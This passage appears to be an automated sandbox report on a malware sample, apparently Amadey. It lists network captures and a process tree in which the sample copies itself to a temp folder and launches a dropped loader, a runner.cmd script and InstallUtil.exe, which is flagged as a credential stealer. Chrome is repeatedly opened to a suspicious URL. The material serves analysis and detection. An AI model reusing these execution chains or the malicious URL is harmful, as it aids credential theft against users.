148	192.168.2.4	49897	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:25 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:25 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:25 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063325Z-16547b76f7f9bs6dhC1DFWt3rg00000007p000000000gu0x x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:25 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49898	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:25 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:25 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:25 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063325Z-16547b76f7fj5p7mhC1DFWf8w400000007t000000000g4w0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:25 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Target ID:	0
Start time:	01:31:55
Start date:	07/11/2024
Path:	C:\Users\user\Desktop\lIocM276SA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lIocM276SA.exe"
Imagebase:	0x2d0000
File size:	3'169'280 bytes
MD5 hash:	ED91FED1365AF41A389141266378CFC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:31:58
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x400000
File size:	3'169'280 bytes
MD5 hash:	ED91FED1365AF41A389141266378CFC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:31:58
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x400000
File size:	3'169'280 bytes
MD5 hash:	ED91FED1365AF41A389141266378CFC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:33:00
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x400000
File size:	3'169'280 bytes
MD5 hash:	ED91FED1365AF41A389141266378CFC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	01:33:12
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe"
Imagebase:	0x8f0000
File size:	1'366'016 bytes
MD5 hash:	CD97D09A95E215EFEE7A40605D6F734C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2799881081.0000000005E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:33:13
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:33:13
Start date:	07/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	01:33:13
Start date:	07/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xd30000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	01:33:13
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	01:33:14
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff7699e0000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:33:14
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:33:14
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:33:15
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1916,i,2743930979166446243,11984125679060302953,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	01:33:15
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1896,i,12903140965514512258,7879093714222373490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:33:15
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2020,i,5642825108350335219,8833507162415557396,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	01:33:16
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,14015565629516230816,9755923701176644948,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	01:33:16
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:33:17
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:33:17
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:33:17
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,10036202946459383482,9416271039885435074,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:33:17
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1584,i,5243679326072088091,3788876514745600771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:33:17
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:33:18
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,10283285120756280865,5244641420518172917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:33:18
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	01:33:18
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,10757545353850069080,17528760924176413797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	01:33:18
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,5668110240625218180,2372566740740461637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	01:33:19
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	01:33:19
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:33:19
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	01:33:19
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1996,i,10628045244502770481,15461531275763280924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	01:33:20
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1988,i,1396496370233068950,16639235529074936853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	01:33:20
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=600 --field-trial-handle=1952,i,5853220489963610329,11725451507788123041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	01:33:20
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	01:33:20
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	01:33:21
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,4294371869201058628,10846258970923498441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	01:33:21
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	01:33:22
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1876,i,8933970381661588511,1818581820197100254,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
